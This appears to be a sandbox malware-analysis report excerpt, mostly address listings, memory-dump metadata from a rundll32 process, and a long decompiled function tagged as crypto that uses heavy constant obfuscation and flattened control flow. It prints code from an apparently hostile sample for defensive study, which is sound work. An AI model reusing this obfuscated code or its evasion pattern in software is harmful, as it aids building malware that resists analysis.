                                                                                                                                  0x002eef6d
                                                                                                                                  0x002eef74
                                                                                                                                  0x002eef7f
                                                                                                                                  0x002eef8a
                                                                                                                                  0x002eef92
                                                                                                                                  0x002eef9d
                                                                                                                                  0x002eefa8
                                                                                                                                  0x002eefb0
                                                                                                                                  0x002eefb5
                                                                                                                                  0x002eefbd
                                                                                                                                  0x002eefc5
                                                                                                                                  0x002eefcd
                                                                                                                                  0x002eefd8
                                                                                                                                  0x002eefe0
                                                                                                                                  0x002eefeb
                                                                                                                                  0x002eeff3
                                                                                                                                  0x002eeffe
                                                                                                                                  0x002ef006
                                                                                                                                  0x002ef00e
                                                                                                                                  0x002ef016
                                                                                                                                  0x002ef01d
                                                                                                                                  0x002ef024
                                                                                                                                  0x002ef024
                                                                                                                                  0x002ef024
                                                                                                                                  0x002ef029
                                                                                                                                  0x002ef029
                                                                                                                                  0x002ef02d
                                                                                                                                  0x002ef02d
                                                                                                                                  0x002ef02d
                                                                                                                                  0x002ef02f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef035
                                                                                                                                  0x002ef17e
                                                                                                                                  0x002ef181
                                                                                                                                  0x002ef183
                                                                                                                                  0x002ef18f
                                                                                                                                  0x002ef1a4
                                                                                                                                  0x002ef1a6
                                                                                                                                  0x002ef1a6
                                                                                                                                  0x002ef1e0
                                                                                                                                  0x002ef1e7
                                                                                                                                  0x002ef1e7
                                                                                                                                  0x002ef1e9
                                                                                                                                  0x002ef1eb
                                                                                                                                  0x002ef1eb
                                                                                                                                  0x002ef1f0
                                                                                                                                  0x002ef237
                                                                                                                                  0x002ef23d
                                                                                                                                  0x002ef242
                                                                                                                                  0x002ef245
                                                                                                                                  0x002ef247
                                                                                                                                  0x002ef2ff
                                                                                                                                  0x002ef24d
                                                                                                                                  0x002ef24d
                                                                                                                                  0x002ef258
                                                                                                                                  0x002ef25d
                                                                                                                                  0x002ef261
                                                                                                                                  0x002ef26f
                                                                                                                                  0x002ef270
                                                                                                                                  0x002ef279
                                                                                                                                  0x002ef27a
                                                                                                                                  0x002ef27f
                                                                                                                                  0x002ef282
                                                                                                                                  0x002ef284
                                                                                                                                  0x002ef2b3
                                                                                                                                  0x002ef2c8
                                                                                                                                  0x002ef2c8
                                                                                                                                  0x002ef2c8
                                                                                                                                  0x002ef2ed
                                                                                                                                  0x002ef2f2
                                                                                                                                  0x002ef2f2
                                                                                                                                  0x002ef2f5
                                                                                                                                  0x002ef2f5
                                                                                                                                  0x002ef096
                                                                                                                                  0x002ef096
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef096
                                                                                                                                  0x002ef041
                                                                                                                                  0x002ef16d
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef16d
                                                                                                                                  0x002ef04d
                                                                                                                                  0x002ef163
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef163
                                                                                                                                  0x002ef059
                                                                                                                                  0x002ef13f
                                                                                                                                  0x002ef144
                                                                                                                                  0x002ef148
                                                                                                                                  0x002ef14b
                                                                                                                                  0x002ef14d
                                                                                                                                  0x002ef156
                                                                                                                                  0x002ef15b
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef15b
                                                                                                                                  0x002ef065
                                                                                                                                  0x002ef09c
                                                                                                                                  0x002ef09d
                                                                                                                                  0x002ef0a4
                                                                                                                                  0x002ef0ab
                                                                                                                                  0x002ef0b5
                                                                                                                                  0x002ef0ca
                                                                                                                                  0x002ef0d6
                                                                                                                                  0x002ef0df
                                                                                                                                  0x002ef0ed
                                                                                                                                  0x002ef0f0
                                                                                                                                  0x002ef0f5
                                                                                                                                  0x002ef3fa
                                                                                                                                  0x002ef3fa
                                                                                                                                  0x002ef3fe
                                                                                                                                  0x002ef403
                                                                                                                                  0x002ef403
                                                                                                                                  0x002ef409
                                                                                                                                  0x002ef42b
                                                                                                                                  0x002ef434
                                                                                                                                  0x002ef434
                                                                                                                                  0x002ef029
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef029
                                                                                                                                  0x002ef06d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef08a
                                                                                                                                  0x002ef091
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef091
                                                                                                                                  0x002ef309
                                                                                                                                  0x002ef30f
                                                                                                                                  0x002ef3ee
                                                                                                                                  0x002ef3f5
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef3f5
                                                                                                                                  0x002ef315
                                                                                                                                  0x002ef31b
                                                                                                                                  0x002ef421
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef427
                                                                                                                                  0x002ef326
                                                                                                                                  0x002ef328
                                                                                                                                  0x002ef3ce
                                                                                                                                  0x002ef3d0
                                                                                                                                  0x002ef3d7
                                                                                                                                  0x002ef3d8
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef3d8
                                                                                                                                  0x002ef32e
                                                                                                                                  0x002ef334
                                                                                                                                  0x002ef3b1
                                                                                                                                  0x002ef3b8
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef3b8
                                                                                                                                  0x002ef336
                                                                                                                                  0x002ef33c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef342
                                                                                                                                  0x002ef349
                                                                                                                                  0x002ef34b
                                                                                                                                  0x002ef34d
                                                                                                                                  0x002ef354
                                                                                                                                  0x002ef354
                                                                                                                                  0x002ef34f
                                                                                                                                  0x002ef34f
                                                                                                                                  0x002ef34f
                                                                                                                                  0x002ef37a
                                                                                                                                  0x002ef37f
                                                                                                                                  0x002ef384
                                                                                                                                  0x002ef38c
                                                                                                                                  0x00000000
                                                                                                                                  0x002ef38c
                                                                                                                                  0x002ef029

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                                  • API String ID: 0-3417817227
                                                                                                                                  • Opcode ID: 2fed18e3830e6ee15e7f800dc22b3ae3822a3446c52a0cc414ef06bc8410d545
                                                                                                                                  • Instruction ID: f816bcd57e3effc503b276fe6521f2bf83562dd02c4bafdcbae8efc3acc3d702
                                                                                                                                  • Opcode Fuzzy Hash: 2fed18e3830e6ee15e7f800dc22b3ae3822a3446c52a0cc414ef06bc8410d545
                                                                                                                                  • Instruction Fuzzy Hash: 30820F71508381CFD378CF26C54AA8BBBE1BBD4718F10892DE6D996260D7B48959CF83
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002DBB7E Relevance: 23.1, Strings: 18, Instructions: 637COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002DBB7E(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				void* _t690;
				void* _t691;
				void* _t697;
				void* _t700;
				void* _t701;
				void* _t704;
				void* _t710;
				char _t711;
				void* _t713;
				void* _t717;
				void* _t719;
				void* _t725;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				void* _t747;
				void* _t763;
				void* _t772;
				void* _t819;
				intOrPtr _t834;
				void* _t840;
				void* _t842;
				void* _t846;
				void* _t847;
				void* _t850;

				_v92 = 0xf68129;
				_v100 = __ecx;
				asm("stosd");
				_t732 = 0x6b;
				asm("stosd");
				_t846 = 0;
				_t725 = 0x7252bf3;
				asm("stosd");
				_v136 = 0x5ab987;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x0f97e334;
				_v240 = 0x5f59f0;
				_v240 = _v240 << 5;
				_v240 = _v240 * 0x46;
				_v240 = _v240 ^ 0x4252f400;
				_v320 = 0x63212;
				_v320 = _v320 + 0xffffd9b7;
				_v320 = _v320 * 0x26;
				_v320 = _v320 + 0xffff4af1;
				_v320 = _v320 ^ 0x00e50ac7;
				_v192 = 0x354250;
				_t26 =  &_v192; // 0x354250
				_v192 =  *_t26 * 0x43;
				_v192 = _v192 ^ 0x0df05af0;
				_v308 = 0x42c709;
				_v308 = _v308 | 0x3400f9ef;
				_v308 = _v308 << 3;
				_v308 = _v308 + 0x3df1;
				_v308 = _v308 ^ 0xa2183d69;
				_v152 = 0x5369e0;
				_v152 = _v152 ^ 0xff6c3c62;
				_v152 = _v152 ^ 0xff3f5582;
				_v276 = 0x14bd80;
				_v276 = _v276 << 5;
				_v276 = _v276 ^ 0x5f90d5fe;
				_v276 = _v276 / _t732;
				_v276 = _v276 ^ 0x00de92e5;
				_v164 = 0xc6025f;
				_t733 = 0x77;
				_v164 = _v164 / _t733;
				_v164 = _v164 ^ 0x0001a9f8;
				_v196 = 0xc87c9f;
				_v196 = _v196 + 0x15df;
				_v196 = _v196 ^ 0x00c8927e;
				_v316 = 0xe66987;
				_v316 = _v316 ^ 0x1b2582a6;
				_t734 = 0x3b;
				_v316 = _v316 * 0x5b;
				_v316 = _v316 + 0x2fb1;
				_v316 = _v316 ^ 0xdea4c46c;
				_v224 = 0xfe0ac2;
				_v224 = _v224 + 0xfffff1ae;
				_v224 = _v224 ^ 0x9ea75b7a;
				_v224 = _v224 ^ 0x9e5aa70a;
				_v272 = 0x969b46;
				_v272 = _v272 / _t734;
				_t735 = 0x5e;
				_v272 = _v272 / _t735;
				_v272 = _v272 ^ 0xefd30b8f;
				_v272 = _v272 ^ 0xefd30d7c;
				_v376 = 0x150d1;
				_v376 = _v376 + 0xf180;
				_v376 = _v376 ^ 0x94f4a204;
				_v376 = _v376 + 0xffff1e44;
				_v376 = _v376 ^ 0x94f362d9;
				_v156 = 0xee57c3;
				_v156 = _v156 >> 1;
				_v156 = _v156 ^ 0x00740491;
				_v212 = 0xc602fd;
				_v212 = _v212 + 0x6a76;
				_v212 = _v212 + 0x1c99;
				_v212 = _v212 ^ 0x00ce641d;
				_v268 = 0xce4877;
				_v268 = _v268 ^ 0x1d22fca4;
				_v268 = _v268 | 0x3421cf88;
				_v268 = _v268 ^ 0x3de53c3b;
				_v124 = 0x747c03;
				_v124 = _v124 + 0xffffbae7;
				_v124 = _v124 ^ 0x007459dd;
				_v236 = 0x1c09ef;
				_t736 = 0x7d;
				_v236 = _v236 * 0x24;
				_v236 = _v236 >> 5;
				_v236 = _v236 ^ 0x00154586;
				_v248 = 0xce2f;
				_v248 = _v248 / _t736;
				_v248 = _v248 ^ 0x54fb24c5;
				_v248 = _v248 ^ 0x54f69380;
				_v368 = 0xa2f216;
				_v368 = _v368 ^ 0x77671628;
				_v368 = _v368 + 0xffffb776;
				_t737 = 0x12;
				_v368 = _v368 * 0x54;
				_v368 = _v368 ^ 0x4cdde93a;
				_v256 = 0x7ecaf1;
				_v256 = _v256 + 0xffff3fac;
				_v256 = _v256 >> 1;
				_v256 = _v256 ^ 0x003aef01;
				_v352 = 0xabf876;
				_v352 = _v352 >> 0xb;
				_v352 = _v352 + 0xffff46d6;
				_v352 = _v352 + 0x2c0c;
				_v352 = _v352 ^ 0xfff246b3;
				_v360 = 0x97ba77;
				_v360 = _v360 ^ 0x3e0377f3;
				_v360 = _v360 >> 0xd;
				_v360 = _v360 / _t737;
				_v360 = _v360 ^ 0x00060934;
				_v336 = 0x8ce7a6;
				_t738 = 0x2f;
				_v336 = _v336 / _t738;
				_v336 = _v336 + 0xffff2624;
				_v336 = _v336 | 0x278756f7;
				_v336 = _v336 ^ 0x278bbfdd;
				_v344 = 0xbf551b;
				_v344 = _v344 * 0x3a;
				_v344 = _v344 ^ 0x84c4554b;
				_v344 = _v344 << 0xf;
				_v344 = _v344 ^ 0x8ea60236;
				_v200 = 0x4381fe;
				_v200 = _v200 | 0xd1728d79;
				_v200 = _v200 ^ 0xd172d7b5;
				_v304 = 0x80f198;
				_t739 = 0x31;
				_v304 = _v304 * 0x64;
				_v304 = _v304 << 0xe;
				_v304 = _v304 + 0xffff9e99;
				_v304 = _v304 ^ 0x97d19a3f;
				_v312 = 0x373eb5;
				_v312 = _v312 / _t739;
				_v312 = _v312 >> 9;
				_v312 = _v312 ^ 0x9e5751db;
				_v312 = _v312 ^ 0x9e5d4ba0;
				_v188 = 0xb51e1e;
				_t740 = 0x6d;
				_v188 = _v188 * 0x30;
				_v188 = _v188 ^ 0x21f969de;
				_v128 = 0x6dafe5;
				_v128 = _v128 + 0xdb72;
				_v128 = _v128 ^ 0x00632f59;
				_v348 = 0xf775fc;
				_v348 = _v348 * 0x7b;
				_v348 = _v348 | 0xe77e6c6c;
				_v348 = _v348 + 0xffff92b3;
				_v348 = _v348 ^ 0xf7fd41f8;
				_v292 = 0x49707d;
				_v292 = _v292 + 0xffffa330;
				_v292 = _v292 + 0x378d;
				_v292 = _v292 ^ 0x2a616ae7;
				_v292 = _v292 ^ 0x2a2200cf;
				_v148 = 0xe2ca7f;
				_v148 = _v148 + 0x2800;
				_v148 = _v148 ^ 0x00ec4a73;
				_v180 = 0x28ed65;
				_t276 =  &_v180; // 0x28ed65
				_v180 =  *_t276 / _t740;
				_v180 = _v180 ^ 0x0008a356;
				_v340 = 0xb04f06;
				_v340 = _v340 | 0x19ae51aa;
				_v340 = _v340 + 0xffff0ab2;
				_v340 = _v340 >> 7;
				_v340 = _v340 ^ 0x003d7bf7;
				_v252 = 0x779412;
				_t741 = 0x28;
				_v252 = _v252 / _t741;
				_v252 = _v252 | 0x065d8c29;
				_v252 = _v252 ^ 0x0653787d;
				_v140 = 0x2cf99d;
				_v140 = _v140 << 0xf;
				_v140 = _v140 ^ 0x7ccdbf9f;
				_v300 = 0xa5c7e2;
				_v300 = _v300 ^ 0xf64f2b87;
				_v300 = _v300 | 0xd6032566;
				_v300 = _v300 << 7;
				_v300 = _v300 ^ 0x75f4cdbc;
				_v204 = 0xc71fe4;
				_v204 = _v204 ^ 0x39f608ad;
				_v204 = _v204 ^ 0x39346367;
				_v332 = 0x26340b;
				_t742 = 0xc;
				_v332 = _v332 / _t742;
				_v332 = _v332 >> 0xc;
				_v332 = _v332 + 0x4006;
				_v332 = _v332 ^ 0x00056ca9;
				_v244 = 0xb4bdd0;
				_v244 = _v244 ^ 0x9dcc8204;
				_t743 = 0x5c;
				_v244 = _v244 * 0x56;
				_v244 = _v244 ^ 0xe668140d;
				_v228 = 0xb7abf;
				_v228 = _v228 ^ 0x8d46dccd;
				_v228 = _v228 / _t743;
				_v228 = _v228 ^ 0x0183fb21;
				_v132 = 0x744574;
				_t744 = 0x2d;
				_v132 = _v132 * 0x27;
				_v132 = _v132 ^ 0x11b9ba9e;
				_v384 = 0x4471dc;
				_v384 = _v384 ^ 0x8273491f;
				_v384 = _v384 / _t744;
				_v384 = _v384 + 0xffffe0da;
				_v384 = _v384 ^ 0x02e26e3a;
				_v324 = 0x605f40;
				_v324 = _v324 + 0xffffce94;
				_v324 = _v324 + 0xffff95c1;
				_v324 = _v324 >> 6;
				_v324 = _v324 ^ 0x0001f278;
				_v380 = 0xfa4dc1;
				_t745 = 0x17;
				_v380 = _v380 * 0x71;
				_v380 = _v380 ^ 0x12ce666f;
				_v380 = _v380 | 0xc76ff931;
				_v380 = _v380 ^ 0xfff34e85;
				_v172 = 0xf73d33;
				_v172 = _v172 >> 7;
				_v172 = _v172 ^ 0x0001a374;
				_v364 = 0xb38f71;
				_v364 = _v364 + 0x4143;
				_v364 = _v364 ^ 0x53c53aac;
				_v364 = _v364 / _t745;
				_v364 = _v364 ^ 0x03acc109;
				_v260 = 0xa91f99;
				_v260 = _v260 >> 0xa;
				_v260 = _v260 ^ 0xc9224c65;
				_v260 = _v260 ^ 0xc926367a;
				_v284 = 0x5ea8fe;
				_v284 = _v284 * 0x3e;
				_v284 = _v284 | 0x757fbe3f;
				_v284 = _v284 ^ 0x77fedad5;
				_v264 = 0xc1651a;
				_v264 = _v264 / _t745;
				_v264 = _v264 + 0x650c;
				_v264 = _v264 ^ 0x00066731;
				_v372 = 0xd53751;
				_v372 = _v372 >> 0x10;
				_v372 = _v372 * 0x50;
				_v372 = _v372 ^ 0xc5a53504;
				_v372 = _v372 ^ 0xc5a85656;
				_v220 = 0x28743;
				_v220 = _v220 | 0x747e4fe0;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0078aec3;
				_v356 = 0x673303;
				_v356 = _v356 + 0xffff3afb;
				_v356 = _v356 >> 2;
				_t746 = 0x76;
				_t842 = 0x6cd454e;
				_v96 = 0x100;
				_t840 = 0xcf5796f;
				_v356 = _v356 * 9;
				_v356 = _v356 ^ 0x00e12344;
				_v232 = 0xe5489f;
				_v232 = _v232 * 0x62;
				_v232 = _v232 ^ 0x422e6763;
				_v232 = _v232 ^ 0x15e3beef;
				_v144 = 0x9d1c0d;
				_v144 = _v144 | 0x5a9db401;
				_v144 = _v144 ^ 0x5a9ceaa6;
				_v328 = 0xaba5b0;
				_v328 = _v328 + 0xfc55;
				_v328 = _v328 * 0x37;
				_v328 = _v328 * 0x78;
				_v328 = _v328 ^ 0x62b938e2;
				_v168 = 0x51360e;
				_v168 = _v168 << 2;
				_v168 = _v168 ^ 0x014a45e2;
				_v176 = 0x11fbeb;
				_v176 = _v176 << 0xa;
				_v176 = _v176 ^ 0x47e89d0f;
				_v216 = 0x8fcc87;
				_v216 = _v216 / _t746;
				_v216 = _v216 ^ 0xd2cd5e41;
				_v216 = _v216 ^ 0xd2c9cc36;
				_v184 = 0x8a666a;
				_v184 = _v184 * 0x6c;
				_v184 = _v184 ^ 0x3a66624b;
				_v288 = 0x12fc4d;
				_v288 = _v288 ^ 0x84b68421;
				_v288 = _v288 * 0x77;
				_v288 = _v288 ^ 0xa87aad10;
				_v296 = 0xb3f337;
				_v296 = _v296 >> 1;
				_v296 = _v296 + 0xffffa2d0;
				_v296 = _v296 + 0xffff98aa;
				_v296 = _v296 ^ 0x0050e375;
				_v160 = 0xa98b94;
				_v160 = _v160 ^ 0x93f8baf3;
				_v160 = _v160 ^ 0x935506dc;
				_v208 = 0xd26eef;
				_v208 = _v208 + 0xffff657d;
				_v208 = _v208 << 5;
				_v208 = _v208 ^ 0x1a3ecca6;
				_v280 = 0xce1cc4;
				_v280 = _v280 << 6;
				_v280 = _v280 << 0x10;
				_v280 = _v280 | 0xb3a7eb9b;
				_v280 = _v280 ^ 0xb3a418cd;
				while(1) {
					L1:
					_t747 = 0xb34e23f;
					while(1) {
						L2:
						while(1) {
							L3:
							_t690 = 0xa0b11f8;
							do {
								while(1) {
									L4:
									_t850 = _t725 - _t690;
									if(_t850 > 0) {
										break;
									}
									if(_t850 == 0) {
										_t700 = E002E4624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
										_t847 = _t847 + 0x14;
										__eflags = _t700;
										_t747 = 0xb34e23f;
										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
										goto L2;
									} else {
										if(_t725 == 0x24fa5ba) {
											_push(_v212);
											_push(_v156);
											_t701 = E002EDCF7(_v376, 0x2d1984, __eflags);
											_push(_v236);
											_push(_v124);
											_t704 = E002D9462(_t701, _v368,  &_v116, E002EDCF7(_v268, 0x2d1814, __eflags), _v256, _v136);
											_t847 = _t847 + 0x24;
											__eflags = _t704 - _v240;
											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
											E002DA8B0(_v352, _t701, _v360);
											E002DA8B0(_v336, _t702, _v344);
											_t840 = 0xcf5796f;
											goto L13;
										} else {
											if(_t725 == 0x505fe8e) {
												_t631 =  &_v208; // 0x39346367
												E002D957D(_v116, _v160,  *_t631, _v272, _v280);
											} else {
												if(_t725 == _t842) {
													_push(_v340);
													_push(_v180);
													_t710 = E002EDCF7(_v148, 0x2d1854, __eflags);
													_pop(_t763);
													_t844 = _t710;
													_t711 = 0x48;
													_v104 = _t711;
													_t713 = E002D1C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
													_t847 = _t847 + 0x28;
													__eflags = _t713 - _v164;
													if(_t713 != _v164) {
														_t725 = _t840;
													} else {
														_t834 =  *0x2f3dfc; // 0x0
														E002DED7E(_v244, _t834, _v228,  &_v68, 0x40);
														_t847 = _t847 + 0xc;
														_t725 = 0x9bcfe4f;
													}
													E002DA8B0(_v132, _t844, _v384);
													goto L13;
												} else {
													if(_t725 == 0x7252bf3) {
														_t725 = 0x24fa5ba;
														continue;
													} else {
														if(_t725 == _t819) {
															_t717 = E002DB144(_v120, _v188, _v308, _v128, _v348, _v292);
															_t847 = _t847 + 0x10;
															__eflags = _t717 - _v152;
															_t725 =  ==  ? _t842 : _t840;
															while(1) {
																L1:
																_t747 = 0xb34e23f;
																L2:
																L3:
																_t690 = 0xa0b11f8;
																goto L4;
															}
														} else {
															_t856 = _t725 - 0x9bcfe4f;
															if(_t725 == 0x9bcfe4f) {
																_push(_v172);
																_push(_v380);
																_t719 = E002EDCF7(_v324, 0x2d1854, _t856);
																_pop(_t772);
																E002DAA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
																_t725 =  ==  ? 0xa0b11f8 : _t840;
																E002DA8B0(_v220, _t719, _v356);
																_t847 = _t847 + 0x2c;
																L13:
																_t842 = 0x6cd454e;
																L32:
																_t819 = 0x9b01f0f;
																_t747 = 0xb34e23f;
																_t690 = 0xa0b11f8;
															}
															goto L33;
														}
													}
												}
											}
										}
									}
									L36:
									return _t846;
								}
								__eflags = _t725 - _t747;
								if(_t725 == _t747) {
									_t691 = E002D2BD9(_v112);
									_t725 = 0xb500bcf;
									__eflags = _t691;
									_t846 =  !=  ? 1 : _t846;
									goto L32;
								} else {
									__eflags = _t725 - 0xb500bcf;
									if(_t725 == 0xb500bcf) {
										E002ECA69(_v112, _v168, _v176);
										_t725 = 0xcc5fcc9;
										goto L1;
									} else {
										__eflags = _t725 - 0xcc5fcc9;
										if(_t725 == 0xcc5fcc9) {
											E002DA958(_v216, _v108, _v184);
											_t725 = _t840;
											while(1) {
												L1:
												_t747 = 0xb34e23f;
												goto L2;
											}
										} else {
											__eflags = _t725 - _t840;
											if(_t725 == _t840) {
												E002DA958(_v288, _v120, _v296);
												_t725 = 0x505fe8e;
												while(1) {
													L1:
													_t747 = 0xb34e23f;
													goto L2;
												}
											} else {
												__eflags = _t725 - 0xec78b05;
												if(__eflags != 0) {
													goto L33;
												} else {
													_v104 = _v96;
													_t697 = E002D92C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
													_t847 = _t847 + 0x14;
													__eflags = _t697 - _v192;
													_t819 = 0x9b01f0f;
													_t747 = 0xb34e23f;
													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
													goto L3;
												}
											}
										}
									}
								}
								goto L36;
								L33:
							} while (_t725 != 0xc75135f);
							goto L36;
						}
					}
				}
			}





















































































































                                                                                                                                  0x002dbb84
                                                                                                                                  0x002dbb9c
                                                                                                                                  0x002dbba3
                                                                                                                                  0x002dbba8
                                                                                                                                  0x002dbbab
                                                                                                                                  0x002dbbac
                                                                                                                                  0x002dbbae
                                                                                                                                  0x002dbbb3
                                                                                                                                  0x002dbbb4
                                                                                                                                  0x002dbbc7
                                                                                                                                  0x002dbbce
                                                                                                                                  0x002dbbd9
                                                                                                                                  0x002dbbe4
                                                                                                                                  0x002dbbf4
                                                                                                                                  0x002dbbfb
                                                                                                                                  0x002dbc06
                                                                                                                                  0x002dbc0e
                                                                                                                                  0x002dbc1b
                                                                                                                                  0x002dbc1f
                                                                                                                                  0x002dbc27
                                                                                                                                  0x002dbc2f
                                                                                                                                  0x002dbc3a
                                                                                                                                  0x002dbc42
                                                                                                                                  0x002dbc49
                                                                                                                                  0x002dbc54
                                                                                                                                  0x002dbc5c
                                                                                                                                  0x002dbc64
                                                                                                                                  0x002dbc69
                                                                                                                                  0x002dbc71
                                                                                                                                  0x002dbc79
                                                                                                                                  0x002dbc84
                                                                                                                                  0x002dbc8f
                                                                                                                                  0x002dbc9a
                                                                                                                                  0x002dbca5
                                                                                                                                  0x002dbcad
                                                                                                                                  0x002dbcc3
                                                                                                                                  0x002dbcca
                                                                                                                                  0x002dbcd5
                                                                                                                                  0x002dbce7
                                                                                                                                  0x002dbcec
                                                                                                                                  0x002dbcf5
                                                                                                                                  0x002dbd00
                                                                                                                                  0x002dbd0b
                                                                                                                                  0x002dbd16
                                                                                                                                  0x002dbd21
                                                                                                                                  0x002dbd29
                                                                                                                                  0x002dbd36
                                                                                                                                  0x002dbd39
                                                                                                                                  0x002dbd3d
                                                                                                                                  0x002dbd45
                                                                                                                                  0x002dbd4d
                                                                                                                                  0x002dbd58
                                                                                                                                  0x002dbd63
                                                                                                                                  0x002dbd6e
                                                                                                                                  0x002dbd79
                                                                                                                                  0x002dbd8f
                                                                                                                                  0x002dbd9d
                                                                                                                                  0x002dbda2
                                                                                                                                  0x002dbdab
                                                                                                                                  0x002dbdb6
                                                                                                                                  0x002dbdc1
                                                                                                                                  0x002dbdc9
                                                                                                                                  0x002dbdd1
                                                                                                                                  0x002dbdd9
                                                                                                                                  0x002dbde1
                                                                                                                                  0x002dbde9
                                                                                                                                  0x002dbdf4
                                                                                                                                  0x002dbdfb
                                                                                                                                  0x002dbe06
                                                                                                                                  0x002dbe11
                                                                                                                                  0x002dbe1c
                                                                                                                                  0x002dbe27
                                                                                                                                  0x002dbe32
                                                                                                                                  0x002dbe3d
                                                                                                                                  0x002dbe48
                                                                                                                                  0x002dbe53
                                                                                                                                  0x002dbe5e
                                                                                                                                  0x002dbe69
                                                                                                                                  0x002dbe74
                                                                                                                                  0x002dbe7f
                                                                                                                                  0x002dbe92
                                                                                                                                  0x002dbe95
                                                                                                                                  0x002dbe9c
                                                                                                                                  0x002dbea4
                                                                                                                                  0x002dbeaf
                                                                                                                                  0x002dbec5
                                                                                                                                  0x002dbecc
                                                                                                                                  0x002dbed7
                                                                                                                                  0x002dbee2
                                                                                                                                  0x002dbeea
                                                                                                                                  0x002dbef2
                                                                                                                                  0x002dbeff
                                                                                                                                  0x002dbf02
                                                                                                                                  0x002dbf06
                                                                                                                                  0x002dbf0e
                                                                                                                                  0x002dbf19
                                                                                                                                  0x002dbf24
                                                                                                                                  0x002dbf2b
                                                                                                                                  0x002dbf36
                                                                                                                                  0x002dbf3e
                                                                                                                                  0x002dbf43
                                                                                                                                  0x002dbf4b
                                                                                                                                  0x002dbf53
                                                                                                                                  0x002dbf5b
                                                                                                                                  0x002dbf63
                                                                                                                                  0x002dbf6b
                                                                                                                                  0x002dbf78
                                                                                                                                  0x002dbf7c
                                                                                                                                  0x002dbf84
                                                                                                                                  0x002dbf90
                                                                                                                                  0x002dbf93
                                                                                                                                  0x002dbf97
                                                                                                                                  0x002dbf9f
                                                                                                                                  0x002dbfa7
                                                                                                                                  0x002dbfaf
                                                                                                                                  0x002dbfbc
                                                                                                                                  0x002dbfc0
                                                                                                                                  0x002dbfc8
                                                                                                                                  0x002dbfcd
                                                                                                                                  0x002dbfd5
                                                                                                                                  0x002dbfe0
                                                                                                                                  0x002dbfeb
                                                                                                                                  0x002dbff8
                                                                                                                                  0x002dc007
                                                                                                                                  0x002dc00a
                                                                                                                                  0x002dc00e
                                                                                                                                  0x002dc013
                                                                                                                                  0x002dc01b
                                                                                                                                  0x002dc023
                                                                                                                                  0x002dc033
                                                                                                                                  0x002dc037
                                                                                                                                  0x002dc03c
                                                                                                                                  0x002dc044
                                                                                                                                  0x002dc04c
                                                                                                                                  0x002dc05f
                                                                                                                                  0x002dc062
                                                                                                                                  0x002dc069
                                                                                                                                  0x002dc074
                                                                                                                                  0x002dc07f
                                                                                                                                  0x002dc08a
                                                                                                                                  0x002dc095
                                                                                                                                  0x002dc0a2
